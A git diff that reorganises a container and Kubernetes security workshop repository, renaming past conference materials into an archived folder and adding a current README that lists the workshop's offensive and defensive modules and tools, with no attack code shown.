diff --git a/README.md b/README.md
index 84d625f..4b80899 100644
--- a/README.md
+++ b/README.md
@@ -1,26 +1,40 @@
# Malicious Containers Workshop
-This repository contains the slides and accompanying lab materials for the workshops delivered at DefCon and other conferences. The most recent being [CactusCon](CactusCon_24/README.md). Each conferences materials will be located in their respective sub-folders.
+A hands-on workshop covering Kubernetes and container security — from offensive techniques to detection and response. Learn to build, deploy, and detect malicious containers in a safe lab environment.
+## Repository Structure
-## Past Workshops
+- **`current/`** — The latest version of the workshop materials, labs, and infrastructure setup. Start here.
+- **`archived/`** — Previous conference-specific versions (DEF CON 30, DEF CON 31, BSides Charleston, CactusCon, ISSA Triad). Preserved for reference.
-The repository also contains past versions of the course, such as the original [Workshop delivered at DEFCON 30 - Creating and Uncovering Malicious Containers](https://forum.defcon.org/node/241774), [DEFCON 31 - Creating and uncovering malicious containers: Redux](https://forum.defcon.org/node/246020) and iterations delivered at [BSides Charleston 22](https://bsideschs.ticketbud.com/ws-creating), [BSides Charleston 23](https://bsideschs.ticketbud.com/ws-malkub), [CactusCon](https://www.cactuscon.com/cc12-schedule) and [ISSA Triad 2023 Security Summit](https://triadnc.issa.org/). As well as any versions to be delivered in the future as we continue to update and improve it or offer it at other events.
+## Getting Started
+See [`current/README.md`](current/README.md) for an overview and [`current/lab-setup.md`](current/lab-setup.md) for environment setup instructions.
+
+## Workshop Modules
+
+1. **Docker Fundamentals** — Images, containers, layers, process hierarchy
+2. **Exploring Containers** — Image history, reverse engineering, extracting artifacts
+3. **Offensive Docker Techniques** — Data exfiltration, socket hijacking, privilege escalation
+4. **Container IR** — Image forensics CTF, cleanup
+5. **Kubernetes 101** — Architecture, components, networking
+6. **Kubernetes Security** — RBAC abuse, privilege escalation, golden ticket attacks, evil pods
+7. **Supply Chain Security** — Image signing (cosign/Sigstore), SBOMs (syft), vulnerability scanning (grype), provenance
+8. **Modern Runtime Security** — Tracee, Falco, Tetragon — eBPF-based detection and comparison
+9. **Cloud-Native Attacks** — IMDS exploitation, workload identity abuse, network policy bypass
## Presenters
### Instructor: David Mitchell
-
->
\
-> https://github.com/digital-shokunin/digital-shokunin/README.md
-
-### Instructor: Adrian Wood
-
->
\
-> https://keybase.io/threlfall
+> [@digish0](https://twitter.com/digish0) | https://digital-shokunin.net
+### Instructor: Adrian Wood
+> [@whitehacksec](https://twitter.com/WHITEHACKSEC) | https://5stars217.github.io
## Our lockpick/hacker(space) group
-[](https://github.com/lockFALE/)
+[](https://github.com/lockFALE/)
+
+## License
+
+See [LICENSE](LICENSE).
diff --git a/BSides_Charleston_23/BSidesCHS23 Malicious Containers Workshop1.1 with notes.pdf b/archived/BSides_Charleston_23/BSidesCHS23 Malicious Containers Workshop1.1 with notes.pdf
similarity index 100%
rename from BSides_Charleston_23/BSidesCHS23 Malicious Containers Workshop1.1 with notes.pdf
rename to archived/BSides_Charleston_23/BSidesCHS23 Malicious Containers Workshop1.1 with notes.pdf
diff --git a/BSides_Charleston_23/BSidesCHS23 Malicious Containers Workshop1.1.pdf b/archived/BSides_Charleston_23/BSidesCHS23 Malicious Containers Workshop1.1.pdf
similarity index 100%
rename from BSides_Charleston_23/BSidesCHS23 Malicious Containers Workshop1.1.pdf
rename to archived/BSides_Charleston_23/BSidesCHS23 Malicious Containers Workshop1.1.pdf
diff --git a/BSides_Charleston_23/Lab Setup.md b/archived/BSides_Charleston_23/Lab Setup.md
similarity index 100%
rename from BSides_Charleston_23/Lab Setup.md
rename to archived/BSides_Charleston_23/Lab Setup.md
diff --git a/BSides_Charleston_23/README.md b/archived/BSides_Charleston_23/README.md
similarity index 100%
rename from BSides_Charleston_23/README.md
rename to archived/BSides_Charleston_23/README.md
diff --git a/BSides_Charleston_23/cheatsheet.md b/archived/BSides_Charleston_23/cheatsheet.md
similarity index 100%
rename from BSides_Charleston_23/cheatsheet.md
rename to archived/BSides_Charleston_23/cheatsheet.md
diff --git a/BSides_Charleston_23/grafana/tracee-dashboard.json b/archived/BSides_Charleston_23/grafana/tracee-dashboard.json
similarity index 100%
rename from BSides_Charleston_23/grafana/tracee-dashboard.json
rename to archived/BSides_Charleston_23/grafana/tracee-dashboard.json
diff --git a/BSides_Charleston_23/helm-config/grafana-config.yaml b/archived/BSides_Charleston_23/helm-config/grafana-config.yaml
similarity index 100%
rename from BSides_Charleston_23/helm-config/grafana-config.yaml
rename to archived/BSides_Charleston_23/helm-config/grafana-config.yaml
diff --git a/BSides_Charleston_23/helm-config/promtail-config.yaml b/archived/BSides_Charleston_23/helm-config/promtail-config.yaml
similarity index 100%
rename from BSides_Charleston_23/helm-config/promtail-config.yaml
rename to archived/BSides_Charleston_23/helm-config/promtail-config.yaml
diff --git a/BSides_Charleston_23/image.png b/archived/BSides_Charleston_23/image.png
similarity index 100%
rename from BSides_Charleston_23/image.png
rename to archived/BSides_Charleston_23/image.png
diff --git a/BSides_Charleston_23/k8s-ansible-setup.yml b/archived/BSides_Charleston_23/k8s-ansible-setup.yml
similarity index 100%
rename from BSides_Charleston_23/k8s-ansible-setup.yml
rename to archived/BSides_Charleston_23/k8s-ansible-setup.yml
diff --git a/BSides_Charleston_23/k8s-manifests/attacker-pod.yaml b/archived/BSides_Charleston_23/k8s-manifests/attacker-pod.yaml
similarity index 100%
rename from BSides_Charleston_23/k8s-manifests/attacker-pod.yaml
rename to archived/BSides_Charleston_23/k8s-manifests/attacker-pod.yaml
diff --git a/BSides_Charleston_23/k8s-manifests/clusterrolebindings.yaml b/archived/BSides_Charleston_23/k8s-manifests/clusterrolebindings.yaml
similarity index 100%
rename from BSides_Charleston_23/k8s-manifests/clusterrolebindings.yaml
rename to archived/BSides_Charleston_23/k8s-manifests/clusterrolebindings.yaml
diff --git a/BSides_Charleston_23/k8s-manifests/clusterroles.yaml b/archived/BSides_Charleston_23/k8s-manifests/clusterroles.yaml
similarity index 100%
rename from BSides_Charleston_23/k8s-manifests/clusterroles.yaml
rename to archived/BSides_Charleston_23/k8s-manifests/clusterroles.yaml
diff --git a/BSides_Charleston_23/k8s-manifests/configmaps.yaml b/archived/BSides_Charleston_23/k8s-manifests/configmaps.yaml
similarity index 100%
rename from BSides_Charleston_23/k8s-manifests/configmaps.yaml
rename to archived/BSides_Charleston_23/k8s-manifests/configmaps.yaml
diff --git a/BSides_Charleston_23/k8s-manifests/daemonsets.yaml b/archived/BSides_Charleston_23/k8s-manifests/daemonsets.yaml
similarity index 100%
rename from BSides_Charleston_23/k8s-manifests/daemonsets.yaml
rename to archived/BSides_Charleston_23/k8s-manifests/daemonsets.yaml
diff --git a/BSides_Charleston_23/k8s-manifests/deployments.yaml b/archived/BSides_Charleston_23/k8s-manifests/deployments.yaml
similarity index 100%
rename from BSides_Charleston_23/k8s-manifests/deployments.yaml
rename to archived/BSides_Charleston_23/k8s-manifests/deployments.yaml
diff --git a/BSides_Charleston_23/k8s-manifests/evilpod.yaml b/archived/BSides_Charleston_23/k8s-manifests/evilpod.yaml
similarity index 100%
rename from BSides_Charleston_23/k8s-manifests/evilpod.yaml
rename to archived/BSides_Charleston_23/k8s-manifests/evilpod.yaml
diff --git a/BSides_Charleston_23/k8s-manifests/ingress.yaml b/archived/BSides_Charleston_23/k8s-manifests/ingress.yaml
similarity index 100%
rename from BSides_Charleston_23/k8s-manifests/ingress.yaml
rename to archived/BSides_Charleston_23/k8s-manifests/ingress.yaml
diff --git a/BSides_Charleston_23/k8s-manifests/namespaces.yaml b/archived/BSides_Charleston_23/k8s-manifests/namespaces.yaml
similarity index 100%
rename from BSides_Charleston_23/k8s-manifests/namespaces.yaml
rename to archived/BSides_Charleston_23/k8s-manifests/namespaces.yaml
diff --git a/BSides_Charleston_23/k8s-manifests/nothingallowedpod.yaml b/archived/BSides_Charleston_23/k8s-manifests/nothingallowedpod.yaml
similarity index 100%
rename from BSides_Charleston_23/k8s-manifests/nothingallowedpod.yaml
rename to archived/BSides_Charleston_23/k8s-manifests/nothingallowedpod.yaml
diff --git a/BSides_Charleston_23/k8s-manifests/pods.yaml b/archived/BSides_Charleston_23/k8s-manifests/pods.yaml
similarity index 100%
rename from BSides_Charleston_23/k8s-manifests/pods.yaml
rename to archived/BSides_Charleston_23/k8s-manifests/pods.yaml
diff --git a/BSides_Charleston_23/k8s-manifests/rolebindings.yaml b/archived/BSides_Charleston_23/k8s-manifests/rolebindings.yaml
similarity index 100%
rename from BSides_Charleston_23/k8s-manifests/rolebindings.yaml
rename to archived/BSides_Charleston_23/k8s-manifests/rolebindings.yaml
diff --git a/BSides_Charleston_23/k8s-manifests/roles.yaml b/archived/BSides_Charleston_23/k8s-manifests/roles.yaml
similarity index 100%
rename from BSides_Charleston_23/k8s-manifests/roles.yaml
rename to archived/BSides_Charleston_23/k8s-manifests/roles.yaml
diff --git a/BSides_Charleston_23/k8s-manifests/secrets.yaml b/archived/BSides_Charleston_23/k8s-manifests/secrets.yaml
similarity index 100%
rename from BSides_Charleston_23/k8s-manifests/secrets.yaml
rename to archived/BSides_Charleston_23/k8s-manifests/secrets.yaml
diff --git a/BSides_Charleston_23/k8s-manifests/serviceaccounts.yaml b/archived/BSides_Charleston_23/k8s-manifests/serviceaccounts.yaml
similarity index 100%
rename from BSides_Charleston_23/k8s-manifests/serviceaccounts.yaml
rename to archived/BSides_Charleston_23/k8s-manifests/serviceaccounts.yaml
diff --git a/BSides_Charleston_23/k8s-manifests/services.yaml b/archived/BSides_Charleston_23/k8s-manifests/services.yaml
similarity index 100%
rename from BSides_Charleston_23/k8s-manifests/services.yaml
rename to archived/BSides_Charleston_23/k8s-manifests/services.yaml
diff --git a/BSides_Charleston_23/kind-lab-config.yaml b/archived/BSides_Charleston_23/kind-lab-config.yaml
similarity index 100%
rename from BSides_Charleston_23/kind-lab-config.yaml
rename to archived/BSides_Charleston_23/kind-lab-config.yaml
diff --git a/BSides_Charleston_23/lab-ansible-setup.yml b/archived/BSides_Charleston_23/lab-ansible-setup.yml
similarity index 100%
rename from BSides_Charleston_23/lab-ansible-setup.yml
rename to archived/BSides_Charleston_23/lab-ansible-setup.yml
diff --git a/BSides_Charleston_23/labs_walk_thru.md b/archived/BSides_Charleston_23/labs_walk_thru.md
similarity index 100%
rename from BSides_Charleston_23/labs_walk_thru.md
rename to archived/BSides_Charleston_23/labs_walk_thru.md
diff --git a/BSides_Charleston_23/scripts/reverse_shell_handler.py b/archived/BSides_Charleston_23/scripts/reverse_shell_handler.py
similarity index 100%
rename from BSides_Charleston_23/scripts/reverse_shell_handler.py
rename to archived/BSides_Charleston_23/scripts/reverse_shell_handler.py
diff --git a/Bsides_Charleston_22/Bsides_Workshop_Pre_Release_1.3.pptx.pdf b/archived/Bsides_Charleston_22/Bsides_Workshop_Pre_Release_1.3.pptx.pdf
similarity index 100%
rename from Bsides_Charleston_22/Bsides_Workshop_Pre_Release_1.3.pptx.pdf
rename to archived/Bsides_Charleston_22/Bsides_Workshop_Pre_Release_1.3.pptx.pdf
diff --git a/Bsides_Charleston_22/Incident Response in containerized and ephemeral environments.pdf b/archived/Bsides_Charleston_22/Incident Response in containerized and ephemeral environments.pdf
similarity index 100%
rename from Bsides_Charleston_22/Incident Response in containerized and ephemeral environments.pdf
rename to archived/Bsides_Charleston_22/Incident Response in containerized and ephemeral environments.pdf
diff --git a/Bsides_Charleston_22/Lab Setup.md b/archived/Bsides_Charleston_22/Lab Setup.md
similarity index 100%
rename from Bsides_Charleston_22/Lab Setup.md
rename to archived/Bsides_Charleston_22/Lab Setup.md
diff --git a/Bsides_Charleston_22/cheatsheet.md b/archived/Bsides_Charleston_22/cheatsheet.md
similarity index 100%
rename from Bsides_Charleston_22/cheatsheet.md
rename to archived/Bsides_Charleston_22/cheatsheet.md
diff --git a/Bsides_Charleston_22/kind-lab-config.yaml b/archived/Bsides_Charleston_22/kind-lab-config.yaml
similarity index 100%
rename from Bsides_Charleston_22/kind-lab-config.yaml
rename to archived/Bsides_Charleston_22/kind-lab-config.yaml
diff --git a/Bsides_Charleston_22/labs_walk_thru.md b/archived/Bsides_Charleston_22/labs_walk_thru.md
similarity index 100%
rename from Bsides_Charleston_22/labs_walk_thru.md
rename to archived/Bsides_Charleston_22/labs_walk_thru.md
diff --git a/Bsides_Charleston_22/readme.md b/archived/Bsides_Charleston_22/readme.md
similarity index 100%
rename from Bsides_Charleston_22/readme.md
rename to archived/Bsides_Charleston_22/readme.md
diff --git a/CactusCon_24/CactusCon'24 Malicious Containers Workshop.pdf b/archived/CactusCon_24/CactusCon'24 Malicious Containers Workshop.pdf
similarity index 100%
rename from CactusCon_24/CactusCon'24 Malicious Containers Workshop.pdf
rename to archived/CactusCon_24/CactusCon'24 Malicious Containers Workshop.pdf
diff --git a/CactusCon_24/Lab Setup.md b/archived/CactusCon_24/Lab Setup.md
similarity index 100%
rename from CactusCon_24/Lab Setup.md
rename to archived/CactusCon_24/Lab Setup.md
diff --git a/CactusCon_24/README.md b/archived/CactusCon_24/README.md
similarity index 100%
rename from CactusCon_24/README.md
rename to archived/CactusCon_24/README.md
diff --git a/CactusCon_24/cheatsheet.md b/archived/CactusCon_24/cheatsheet.md
similarity index 100%
rename from CactusCon_24/cheatsheet.md
rename to archived/CactusCon_24/cheatsheet.md
diff --git a/CactusCon_24/grafana/tracee-dashboard.json b/archived/CactusCon_24/grafana/tracee-dashboard.json
similarity index 100%
rename from CactusCon_24/grafana/tracee-dashboard.json
rename to archived/CactusCon_24/grafana/tracee-dashboard.json
diff --git a/CactusCon_24/helm-config/grafana-config.yaml b/archived/CactusCon_24/helm-config/grafana-config.yaml
similarity index 100%
rename from CactusCon_24/helm-config/grafana-config.yaml
rename to archived/CactusCon_24/helm-config/grafana-config.yaml
diff --git a/CactusCon_24/helm-config/promtail-config.yaml b/archived/CactusCon_24/helm-config/promtail-config.yaml
similarity index 100%
rename from CactusCon_24/helm-config/promtail-config.yaml
rename to archived/CactusCon_24/helm-config/promtail-config.yaml
diff --git a/CactusCon_24/image.png b/archived/CactusCon_24/image.png
similarity index 100%
rename from CactusCon_24/image.png
rename to archived/CactusCon_24/image.png
diff --git a/CactusCon_24/k8s-ansible-setup.yml b/archived/CactusCon_24/k8s-ansible-setup.yml
similarity index 100%
rename from CactusCon_24/k8s-ansible-setup.yml
rename to archived/CactusCon_24/k8s-ansible-setup.yml
diff --git a/CactusCon_24/k8s-manifests/attacker-pod.yaml b/archived/CactusCon_24/k8s-manifests/attacker-pod.yaml
similarity index 100%
rename from CactusCon_24/k8s-manifests/attacker-pod.yaml
rename to archived/CactusCon_24/k8s-manifests/attacker-pod.yaml
diff --git a/CactusCon_24/k8s-manifests/clusterrolebindings.yaml b/archived/CactusCon_24/k8s-manifests/clusterrolebindings.yaml
similarity index 100%
rename from CactusCon_24/k8s-manifests/clusterrolebindings.yaml
rename to archived/CactusCon_24/k8s-manifests/clusterrolebindings.yaml
diff --git a/CactusCon_24/k8s-manifests/clusterroles.yaml b/archived/CactusCon_24/k8s-manifests/clusterroles.yaml
similarity index 100%
rename from CactusCon_24/k8s-manifests/clusterroles.yaml
rename to archived/CactusCon_24/k8s-manifests/clusterroles.yaml
diff --git a/CactusCon_24/k8s-manifests/configmaps.yaml b/archived/CactusCon_24/k8s-manifests/configmaps.yaml
similarity index 100%
rename from CactusCon_24/k8s-manifests/configmaps.yaml
rename to archived/CactusCon_24/k8s-manifests/configmaps.yaml
diff --git a/CactusCon_24/k8s-manifests/daemonsets.yaml b/archived/CactusCon_24/k8s-manifests/daemonsets.yaml
similarity index 100%
rename from CactusCon_24/k8s-manifests/daemonsets.yaml
rename to archived/CactusCon_24/k8s-manifests/daemonsets.yaml
diff --git a/CactusCon_24/k8s-manifests/deployments.yaml b/archived/CactusCon_24/k8s-manifests/deployments.yaml
similarity index 100%
rename from CactusCon_24/k8s-manifests/deployments.yaml
rename to archived/CactusCon_24/k8s-manifests/deployments.yaml
diff --git a/CactusCon_24/k8s-manifests/evilpod.yaml b/archived/CactusCon_24/k8s-manifests/evilpod.yaml
similarity index 100%
rename from CactusCon_24/k8s-manifests/evilpod.yaml
rename to archived/CactusCon_24/k8s-manifests/evilpod.yaml
diff --git a/CactusCon_24/k8s-manifests/ingress.yaml b/archived/CactusCon_24/k8s-manifests/ingress.yaml
similarity index 100%
rename from CactusCon_24/k8s-manifests/ingress.yaml
rename to archived/CactusCon_24/k8s-manifests/ingress.yaml
diff --git a/CactusCon_24/k8s-manifests/namespaces.yaml b/archived/CactusCon_24/k8s-manifests/namespaces.yaml
similarity index 100%
rename from CactusCon_24/k8s-manifests/namespaces.yaml
rename to archived/CactusCon_24/k8s-manifests/namespaces.yaml
diff --git a/CactusCon_24/k8s-manifests/nothingallowedpod.yaml b/archived/CactusCon_24/k8s-manifests/nothingallowedpod.yaml
similarity index 100%
rename from CactusCon_24/k8s-manifests/nothingallowedpod.yaml
rename to archived/CactusCon_24/k8s-manifests/nothingallowedpod.yaml
diff --git a/CactusCon_24/k8s-manifests/pods.yaml b/archived/CactusCon_24/k8s-manifests/pods.yaml
similarity index 100%
rename from CactusCon_24/k8s-manifests/pods.yaml
rename to archived/CactusCon_24/k8s-manifests/pods.yaml
diff --git a/CactusCon_24/k8s-manifests/rolebindings.yaml b/archived/CactusCon_24/k8s-manifests/rolebindings.yaml
similarity index 100%
rename from CactusCon_24/k8s-manifests/rolebindings.yaml
rename to archived/CactusCon_24/k8s-manifests/rolebindings.yaml
diff --git a/CactusCon_24/k8s-manifests/roles.yaml b/archived/CactusCon_24/k8s-manifests/roles.yaml
similarity index 100%
rename from CactusCon_24/k8s-manifests/roles.yaml
rename to archived/CactusCon_24/k8s-manifests/roles.yaml
diff --git a/CactusCon_24/k8s-manifests/secrets.yaml b/archived/CactusCon_24/k8s-manifests/secrets.yaml
similarity index 100%
rename from CactusCon_24/k8s-manifests/secrets.yaml
rename to archived/CactusCon_24/k8s-manifests/secrets.yaml
diff --git a/CactusCon_24/k8s-manifests/serviceaccounts.yaml b/archived/CactusCon_24/k8s-manifests/serviceaccounts.yaml
similarity index 100%
rename from CactusCon_24/k8s-manifests/serviceaccounts.yaml
rename to archived/CactusCon_24/k8s-manifests/serviceaccounts.yaml
diff --git a/CactusCon_24/k8s-manifests/services.yaml b/archived/CactusCon_24/k8s-manifests/services.yaml
similarity index 100%
rename from CactusCon_24/k8s-manifests/services.yaml
rename to archived/CactusCon_24/k8s-manifests/services.yaml
diff --git a/CactusCon_24/kind-lab-config.yaml b/archived/CactusCon_24/kind-lab-config.yaml
similarity index 100%
rename from CactusCon_24/kind-lab-config.yaml
rename to archived/CactusCon_24/kind-lab-config.yaml
diff --git a/CactusCon_24/lab-ansible-setup.yml b/archived/CactusCon_24/lab-ansible-setup.yml
similarity index 100%
rename from CactusCon_24/lab-ansible-setup.yml
rename to archived/CactusCon_24/lab-ansible-setup.yml
diff --git a/CactusCon_24/labs_walk_thru.md b/archived/CactusCon_24/labs_walk_thru.md
similarity index 100%
rename from CactusCon_24/labs_walk_thru.md
rename to archived/CactusCon_24/labs_walk_thru.md
diff --git a/CactusCon_24/scripts/reverse_shell_handler.py b/archived/CactusCon_24/scripts/reverse_shell_handler.py
similarity index 100%
rename from CactusCon_24/scripts/reverse_shell_handler.py
rename to archived/CactusCon_24/scripts/reverse_shell_handler.py
diff --git a/DC30/Defcon_Workshop_Release_1.0.pptx.pdf b/archived/DC30/Defcon_Workshop_Release_1.0.pptx.pdf
similarity index 100%
rename from DC30/Defcon_Workshop_Release_1.0.pptx.pdf
rename to archived/DC30/Defcon_Workshop_Release_1.0.pptx.pdf
diff --git a/DC30/Defcon_Workshop_Release_1.1.with notes.pdf b/archived/DC30/Defcon_Workshop_Release_1.1.with notes.pdf
similarity index 100%
rename from DC30/Defcon_Workshop_Release_1.1.with notes.pdf
rename to archived/DC30/Defcon_Workshop_Release_1.1.with notes.pdf
diff --git a/DC30/Lab Setup.md b/archived/DC30/Lab Setup.md
similarity index 100%
rename from DC30/Lab Setup.md
rename to archived/DC30/Lab Setup.md
diff --git a/DC30/README.md b/archived/DC30/README.md
similarity index 100%
rename from DC30/README.md
rename to archived/DC30/README.md
diff --git a/DC30/cheatsheet.md b/archived/DC30/cheatsheet.md
similarity index 100%
rename from DC30/cheatsheet.md
rename to archived/DC30/cheatsheet.md
diff --git a/DC30/kind-lab-config.yaml b/archived/DC30/kind-lab-config.yaml
similarity index 100%
rename from DC30/kind-lab-config.yaml
rename to archived/DC30/kind-lab-config.yaml
diff --git a/DC30/labs_walk_thru.md b/archived/DC30/labs_walk_thru.md
similarity index 100%
rename from DC30/labs_walk_thru.md
rename to archived/DC30/labs_walk_thru.md
diff --git a/DC31/DC31 Malicious Containers Workshop1.1.pdf b/archived/DC31/DC31 Malicious Containers Workshop1.1.pdf
similarity index 100%
rename from DC31/DC31 Malicious Containers Workshop1.1.pdf
rename to archived/DC31/DC31 Malicious Containers Workshop1.1.pdf
diff --git a/DC31/Lab Setup.md b/archived/DC31/Lab Setup.md
similarity index 100%
rename from DC31/Lab Setup.md
rename to archived/DC31/Lab Setup.md
diff --git a/DC31/README.md b/archived/DC31/README.md
similarity index 100%
rename from DC31/README.md
rename to archived/DC31/README.md
diff --git a/DC31/cheatsheet.md b/archived/DC31/cheatsheet.md
similarity index 100%
rename from DC31/cheatsheet.md
rename to archived/DC31/cheatsheet.md
diff --git a/DC31/grafana/tracee-dashboard.json b/archived/DC31/grafana/tracee-dashboard.json
similarity index 100%
rename from DC31/grafana/tracee-dashboard.json
rename to archived/DC31/grafana/tracee-dashboard.json
diff --git a/DC31/helm-config/grafana-config.yaml b/archived/DC31/helm-config/grafana-config.yaml
similarity index 100%
rename from DC31/helm-config/grafana-config.yaml
rename to archived/DC31/helm-config/grafana-config.yaml
diff --git a/DC31/helm-config/promtail-config.yaml b/archived/DC31/helm-config/promtail-config.yaml
similarity index 100%
rename from DC31/helm-config/promtail-config.yaml
rename to archived/DC31/helm-config/promtail-config.yaml
diff --git a/DC31/k8s-ansible-setup.yml b/archived/DC31/k8s-ansible-setup.yml
similarity index 100%
rename from DC31/k8s-ansible-setup.yml
rename to archived/DC31/k8s-ansible-setup.yml
diff --git a/DC31/k8s-manifests/clusterrolebindings.yaml b/archived/DC31/k8s-manifests/clusterrolebindings.yaml
similarity index 100%
rename from DC31/k8s-manifests/clusterrolebindings.yaml
rename to archived/DC31/k8s-manifests/clusterrolebindings.yaml
diff --git a/DC31/k8s-manifests/clusterroles.yaml b/archived/DC31/k8s-manifests/clusterroles.yaml
similarity index 100%
rename from DC31/k8s-manifests/clusterroles.yaml
rename to archived/DC31/k8s-manifests/clusterroles.yaml
diff --git a/DC31/k8s-manifests/configmaps.yaml b/archived/DC31/k8s-manifests/configmaps.yaml
similarity index 100%
rename from DC31/k8s-manifests/configmaps.yaml
rename to archived/DC31/k8s-manifests/configmaps.yaml
diff --git a/DC31/k8s-manifests/daemonsets.yaml b/archived/DC31/k8s-manifests/daemonsets.yaml
similarity index 100%
rename from DC31/k8s-manifests/daemonsets.yaml
rename to archived/DC31/k8s-manifests/daemonsets.yaml
diff --git a/DC31/k8s-manifests/deployments.yaml b/archived/DC31/k8s-manifests/deployments.yaml
similarity index 100%
rename from DC31/k8s-manifests/deployments.yaml
rename to archived/DC31/k8s-manifests/deployments.yaml
diff --git a/DC31/k8s-manifests/evilpod.yaml b/archived/DC31/k8s-manifests/evilpod.yaml
similarity index 100%
rename from DC31/k8s-manifests/evilpod.yaml
rename to archived/DC31/k8s-manifests/evilpod.yaml
diff --git a/DC31/k8s-manifests/ingress.yaml b/archived/DC31/k8s-manifests/ingress.yaml
similarity index 100%
rename from DC31/k8s-manifests/ingress.yaml
rename to archived/DC31/k8s-manifests/ingress.yaml
diff --git a/DC31/k8s-manifests/namespaces.yaml b/archived/DC31/k8s-manifests/namespaces.yaml
similarity index 100%
rename from DC31/k8s-manifests/namespaces.yaml
rename to archived/DC31/k8s-manifests/namespaces.yaml
diff --git a/DC31/k8s-manifests/nothingallowedpod.yaml b/archived/DC31/k8s-manifests/nothingallowedpod.yaml
similarity index 100%
rename from DC31/k8s-manifests/nothingallowedpod.yaml
rename to archived/DC31/k8s-manifests/nothingallowedpod.yaml
diff --git a/DC31/k8s-manifests/pods.yaml b/archived/DC31/k8s-manifests/pods.yaml
similarity index 100%
rename from DC31/k8s-manifests/pods.yaml
rename to archived/DC31/k8s-manifests/pods.yaml
diff --git a/DC31/k8s-manifests/rolebindings.yaml b/archived/DC31/k8s-manifests/rolebindings.yaml
similarity index 100%
rename from DC31/k8s-manifests/rolebindings.yaml
rename to archived/DC31/k8s-manifests/rolebindings.yaml
diff --git a/DC31/k8s-manifests/roles.yaml b/archived/DC31/k8s-manifests/roles.yaml
similarity index 100%
rename from DC31/k8s-manifests/roles.yaml
rename to archived/DC31/k8s-manifests/roles.yaml
diff --git a/DC31/k8s-manifests/secrets.yaml b/archived/DC31/k8s-manifests/secrets.yaml
similarity index 100%
rename from DC31/k8s-manifests/secrets.yaml
rename to archived/DC31/k8s-manifests/secrets.yaml
diff --git a/DC31/k8s-manifests/serviceaccounts.yaml b/archived/DC31/k8s-manifests/serviceaccounts.yaml
similarity index 100%
rename from DC31/k8s-manifests/serviceaccounts.yaml
rename to archived/DC31/k8s-manifests/serviceaccounts.yaml
diff --git a/DC31/k8s-manifests/services.yaml b/archived/DC31/k8s-manifests/services.yaml
similarity index 100%
rename from DC31/k8s-manifests/services.yaml
rename to archived/DC31/k8s-manifests/services.yaml
diff --git a/DC31/kind-lab-config.yaml b/archived/DC31/kind-lab-config.yaml
similarity index 100%
rename from DC31/kind-lab-config.yaml
rename to archived/DC31/kind-lab-config.yaml
diff --git a/DC31/lab-ansible-setup.yml b/archived/DC31/lab-ansible-setup.yml
similarity index 100%
rename from DC31/lab-ansible-setup.yml
rename to archived/DC31/lab-ansible-setup.yml
diff --git a/DC31/labs_walk_thru.md b/archived/DC31/labs_walk_thru.md
similarity index 100%
rename from DC31/labs_walk_thru.md
rename to archived/DC31/labs_walk_thru.md
diff --git a/ISSA_Triad_23/ISSA_Workshop_Pre_Release_1.3.pptx.pdf b/archived/ISSA_Triad_23/ISSA_Workshop_Pre_Release_1.3.pptx.pdf
similarity index 100%
rename from ISSA_Triad_23/ISSA_Workshop_Pre_Release_1.3.pptx.pdf
rename to archived/ISSA_Triad_23/ISSA_Workshop_Pre_Release_1.3.pptx.pdf
diff --git a/ISSA_Triad_23/Lab Setup.md b/archived/ISSA_Triad_23/Lab Setup.md
similarity index 100%
rename from ISSA_Triad_23/Lab Setup.md
rename to archived/ISSA_Triad_23/Lab Setup.md
diff --git a/ISSA_Triad_23/cheatsheet.md b/archived/ISSA_Triad_23/cheatsheet.md
similarity index 100%
rename from ISSA_Triad_23/cheatsheet.md
rename to archived/ISSA_Triad_23/cheatsheet.md
diff --git a/ISSA_Triad_23/kind-lab-config.yaml b/archived/ISSA_Triad_23/kind-lab-config.yaml
similarity index 100%
rename from ISSA_Triad_23/kind-lab-config.yaml
rename to archived/ISSA_Triad_23/kind-lab-config.yaml
diff --git a/ISSA_Triad_23/labs_walk_thru.md b/archived/ISSA_Triad_23/labs_walk_thru.md
similarity index 100%
rename from ISSA_Triad_23/labs_walk_thru.md
rename to archived/ISSA_Triad_23/labs_walk_thru.md
diff --git a/ISSA_Triad_23/readme.me b/archived/ISSA_Triad_23/readme.me
similarity index 100%
rename from ISSA_Triad_23/readme.me
rename to archived/ISSA_Triad_23/readme.me
diff --git a/current/CactusCon'24 Malicious Containers Workshop.pdf b/current/CactusCon'24 Malicious Containers Workshop.pdf
new file mode 100644
index 0000000..0f92898
Binary files /dev/null and b/current/CactusCon'24 Malicious Containers Workshop.pdf differ
diff --git a/current/README.md b/current/README.md
new file mode 100644
index 0000000..9927d64
--- /dev/null
+++ b/current/README.md
@@ -0,0 +1,50 @@
+# Malicious Kubernetes Workshop
+
+This directory contains the current version of the Malicious Kubernetes workshop materials. The workshop is an introduction to Kubernetes and container security — covering cluster deployment, offensive container techniques, privilege escalation, supply chain security, and runtime detection with modern eBPF-based tools.
+
+
+
+## Quick Start
+
+1. **[Lab Setup](lab-setup.md)** — Environment setup (GCP VM, tooling, kind cluster)
+2. **[Lab Walk-Through](labs_walk_thru.md)** — Step-by-step lab instructions for all modules
+3. **[Cheat Sheet](cheatsheet.md)** — Troubleshooting and quick reference
+
+## What's Covered
+
+| Module | Topic |
+|--------|-------|
+| 1 | Docker fundamentals |
+| 2 | Exploring container images & reverse engineering |
+| 3 | Offensive Docker techniques (exfil, socket hijacking, persistence) |
+| 4 | Container incident response CTF |
+| 5 | Kubernetes 101 |
+| 6 | Kubernetes security — RBAC abuse, priv esc, golden tickets, evil pods |
+| 7 | Supply chain security — cosign, syft, grype, image provenance |
+| 8 | Modern runtime security — Tracee, Falco, Tetragon |
+| 9 | Cloud-native & managed K8s attacks — IMDS, workload identity, network policy bypass |
+
+## Tools Used
+
+- **Infrastructure**: kind, kubectl (v1.31), Helm v3, Ansible
+- **Observability**: Prometheus, Grafana, Loki, Promtail
+- **Runtime Security**: Tracee, Falco (+Falcosidekick), Tetragon
+- **Supply Chain**: cosign, crane, syft, grype
+- **Offensive**: ngrok, openssl, nmap, socat
+
+## Presenters
+
+### Instructor: David Mitchell
+
+
+> [@digish0](https://twitter.com/digish0)\
+> https://digital-shokunin.net
+
+### Instructor: Adrian Wood
+
+> [@whitehacksec](https://twitter.com/WHITEHACKSEC)\
+> https://5stars217.github.io
+
+## Our lockpick/hacker(space) group
+
+
diff --git a/current/cheatsheet.md b/current/cheatsheet.md
new file mode 100644
index 0000000..dd5733d
--- /dev/null
+++ b/current/cheatsheet.md
@@ -0,0 +1,213 @@
+# Cheatsheet
+**This is an accompanying file with the lab instructions and commands to help those especially new to linux/docker/kubernetes.**
+
